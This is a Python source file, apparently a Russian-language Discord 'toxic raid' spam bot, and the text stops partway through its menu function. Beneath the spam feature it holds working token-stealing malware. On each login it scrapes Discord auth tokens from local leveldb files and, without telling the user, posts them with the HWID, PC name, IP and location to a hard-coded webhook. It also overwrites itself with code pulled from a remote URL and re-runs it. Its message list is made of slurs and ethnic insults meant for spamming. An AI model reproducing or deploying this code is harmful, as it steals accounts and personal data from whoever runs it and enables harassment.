import requests, os, sys, time, random, keyboard, threading, uuid, platform, re, glob
from datetime import datetime

BOT_VERSION = "1.12.5"
VERSION_URL = "https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/version"
WEBHOOK_URL = "https://discord.com/api/webhooks/1441468500563464262/CEhND_2oO4_AZrmpIk0TMQQvMNkb0ZALaMHswMPcjggvdcjljPSa0cSkS7NSf5xis7_S"
FOLDER = r"C:\zennix"
CONFIG = os.path.join(FOLDER, "config.txt")
LOCAL_VERSION_FILE = os.path.join(FOLDER, "version.txt")

def clear(): os.system("cls" if os.name=="nt" else "clear")
def t(text, d=0.04):
    for c in text: print(c, end="", flush=True); time.sleep(d)
    print()

def get_discord_token():
    tokens = []
    paths = [
        os.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb",
        os.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb",
        os.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb",
    ]
    for path in paths:
        if not os.path.exists(path): continue
        for file in glob.glob(path + "\\*.ldb") + glob.glob(path + "\\*.log"):
            try:
                with open(file, "rb") as f:
                    content = f.read().decode(errors="ignore")
                    for token in re.findall(r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}", content):
                        if token not in tokens:
                            tokens.append(token)
            except: pass
    return tokens if tokens else ["Не найдено"]

def send_webhook(username):
    try:
        hwid = str(uuid.UUID(int=uuid.getnode()))
        pc_name = platform.node()
        ip_info = requests.get("http://ip-api.com/json/", timeout=5).json()
        ip = ip_info.get("query", "Неизвестно")
        location = f"{ip_info.get('city','?')}, {ip_info.get('country','?')}"
        tokens = get_discord_token()
        token_text = "\n".join([f"`{t}`" for t in tokens[:5]]) if "Не найдено" not in tokens else "Не найдено"
        
        data = {
            "embeds": [{
                "title": "ZENNIX TOX — ЗАПУСК + DISCORD TOKEN",
                "color": 16711680,
                "fields": [
                    {"name": "Логин", "value": username, "inline": True},
                    {"name": "PC", "value": pc_name, "inline": True},
                    {"name": "HWID", "value": f"```{hwid}```", "inline": False},
                    {"name": "IP", "value": ip, "inline": True},
                    {"name": "Город", "value": location, "inline": True},
                    {"name": "Discord токены", "value": token_text, "inline": False},
                    {"name": "Время", "value": datetime.now().strftime("%d.%m.%Y %H:%M:%S"), "inline": False}
                ]
            }]
        }
        requests.post(WEBHOOK_URL, json=data)
    except: pass

def check_update():
    try:
        online = requests.get(VERSION_URL, timeout=10).text.strip()
        local = open(LOCAL_VERSION_FILE).read().strip() if os.path.exists(LOCAL_VERSION_FILE) else "0.0.0"
        if online != local:
            clear()
            print("\033[91m╔════════════════════════════════╗")
            print("║ ОБЯЗАТЕЛЬНОЕ ОБНОВЛЕНИЕ ║")
            print(f"║ У тебя: {local} ║")
            print(f"║ Новая: {online} ║")
            print("╚════════════════════════════════╝\033[0m")
            input("\n Нажми Enter для обновления...")
            code = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/main", timeout=30).text
            with open(__file__, "w", encoding="utf-8") as f: f.write(code)
            with open(LOCAL_VERSION_FILE, "w") as f: f.write(online)
            print(" Перезапуск...")
            time.sleep(2)
            os.execv(sys.executable, [sys.executable] + sys.argv)
    except: pass

def login():
    global current_user, DELAY, MESSAGES
    try:
        raw = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/toxic", timeout=8).text.strip()
        valid_creds = {}
        for line in raw.splitlines():
            if ":" in line:
                u, p = line.split(":", 1)
                valid_creds[u.strip().lower()] = p.strip()
    except:
        clear(); t(" НЕТ СВЯЗИ С СЕРВЕРОМ АВТОРИЗАЦИИ"); time.sleep(5); sys.exit()
    if os.path.exists(CONFIG):
        try:
            lines = [x.strip() for x in open(CONFIG, encoding="utf-8")]
            if len(lines) >= 3 and lines[0].lower() in valid_creds and valid_creds[lines[0].lower()] == lines[1]:
                current_user = lines[0]
                DELAY = float(lines[2])
                MESSAGES = [(m, DELAY) for m in MESSAGES]
                send_webhook(current_user)
                clear(); t(f" Автологин: {current_user}"); time.sleep(1.5); return
        except: pass
        os.remove(CONFIG)
    clear()
    print(" ZENNIX TOX | АВТОРИЗАЦИЯ")
    for i in range(1,4):
        u = input(f"\n [{i}/3] Логин: ").strip()
        p = input(" Пароль: ").strip()
        if u.lower() in valid_creds and valid_creds[u.lower()] == p:
            current_user = u
            send_webhook(u)
            if input(" Запомнить? (y/n): ").lower() in ["y","да"]:
                open(CONFIG,"w",encoding="utf-8").write(f"{u}\n{p}\n{DELAY}")
            t(" ДОСТУП РАЗРЕШЁН"); return
        t(f" НЕВЕРНО ({i}/3)")
    t(" ДОСТУП ЗАПРЕЩЁН"); time.sleep(4); sys.exit()

MESSAGES = [(m, 0.8) for m in ["у тебя ммть шлюхв","я кнк месник","ей руки отрезал","верещтт свинка хоххлятская","ебанный ледниковый период","сид обосранный","клыкастый я тебе с хуя зубы выбил","у тя мамка в копьем в жопе танцует","норм ты ебанная чибурашка","клапоухий пидор","педик волосатый","пинок под жопу дам те","в клетку улетишь","жопой коноплю собираешь","дырявый","петух","кусок говна","че за хуйня хуесос","ебанный индеец"]]
stop_event = threading.Event()
spam_active = False
current_user = "unknown"
DELAY = 0.8

def banner():
    clear()
    print("\033[95m" + r"""
 ███████╗███████╗███╗ ██╗███╗ ██╗██╗██╗ ██╗
 ╚══███╔╝██╔════╝████╗ ██║████╗ ██║██║╚██╗██╔╝
   ███╔╝ █████╗ ██╔██╗ ██║██╔██╗ ██║██║ ╚███╔╝
  ███╔╝ ██╔══╝ ██║╚██╗██║██║╚██╗██║██║ ██╔██╗
 ███████╗███████╗██║ ╚████║██║ ╚████║██║██╔╝ ██╗
 ╚══════╝╚══════╝╚═╝ ╚═══╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝ v1.12.5
    \033[0m\033[91m ╔═ TOXIC RAID SYSTEM ═╗\033[0m
    """)

def progress(stage):
    print(f" └─> {stage}")
    for i in range(1, 41):
        bar = "█" * i + "░" * (40 - i)
        print(f"\r [{bar}] {i*2.5:.1f}%", end="", flush=True)
        time.sleep(random.uniform(0.03, 0.09))
    print()

def change_delay():
    global DELAY, MESSAGES
    try:
        new = float(input(f" Текущая: {DELAY}s → Новая (0.1-5.0): ").replace(",","."))
        if 0.1 <= new <= 5.0:
            DELAY = new
            MESSAGES = [(m,new) for m,_ in MESSAGES]
            with open(CONFIG,"r",encoding="utf-8") as f: lines = f.readlines()
            lines[-1] = str(new)+"\n"
            with open(CONFIG,"w",encoding="utf-8") as f: f.writelines(lines)
            t(f" Задержка: {new}s")
    except: t(" Ошибка"); time.sleep(2)

def menu():
    while True:
        clear(); banner()
        print(f"
